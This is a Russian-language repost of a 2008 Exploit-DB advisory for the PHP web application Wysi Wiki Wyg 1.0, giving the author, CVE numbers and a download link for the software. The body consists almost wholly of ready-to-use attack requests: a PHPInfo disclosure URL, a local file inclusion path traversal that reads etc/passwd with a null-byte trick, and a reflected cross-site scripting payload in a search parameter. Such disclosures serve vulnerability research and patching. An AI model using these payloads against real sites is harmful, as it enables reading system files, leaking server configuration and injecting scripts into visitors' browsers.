- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6042
- Проверка EDB
-
- Пройдено
- Автор
- STAKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5323 cve-2008-5322 cve-2008-3205
- Дата публикации
- 2008-10-20
Код:
/*
Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
----------------------------------------------------------
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
----------------------------------------------------------
1- PHPInfo Disclosure
- index.php?categup=isset
2- Local File Inclusion (LFI) (MQ Off)
- index.php?c=../../../&a=etc/passwd%00
3- Cross Site Scripting (XSS)
- index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>
*/
# milw0rm.com [2008-10-20]- Источник
- www.exploit-db.com
